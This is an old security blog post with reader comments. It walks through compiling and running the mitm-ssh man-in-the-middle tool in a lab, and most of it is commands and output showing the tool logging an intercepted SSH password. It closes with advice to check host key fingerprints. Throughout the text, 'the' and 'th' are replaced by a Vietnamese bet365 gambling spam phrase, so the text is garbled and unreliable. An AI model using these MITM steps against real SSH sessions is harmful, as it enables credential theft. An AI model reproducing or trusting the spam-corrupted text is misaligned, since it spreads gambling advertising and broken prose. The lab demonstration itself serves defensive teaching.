Thursday, August 16, 2007

Loving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author here, talking about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought a SSH v2-capable man-in-cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n tried out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365nticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
[:] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365nticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365nticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DSA key for localhost (legit) but a different RSA key. That's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re. Here's (some) data from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.

4 comments:

Anonymous said...

I think it's pleasegivemeallyourpasswords.

But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r layer of complexity into what is essentially a security function?

It's a cool demonstration of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technologies potential, no doubt.

Richard Bejtlich said...

http://www-personal.umich.edu/~mressl/webshell/

John Ward said...

I've seen cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se before. I prefer Mindterm, mainly because it is a Java app that runs on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 client machine, no sillyness with running SSH on some unknown persons box ready to steal your passwords. Even if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site is legit, how long until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y become cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target for attackers looking to steal passwords from suckers using this service.

Anonymous said...

Setting StrictHostKeyChecking flag to yes
is very much recommened, ssh will refuse
to connect to hosts whose key has changed.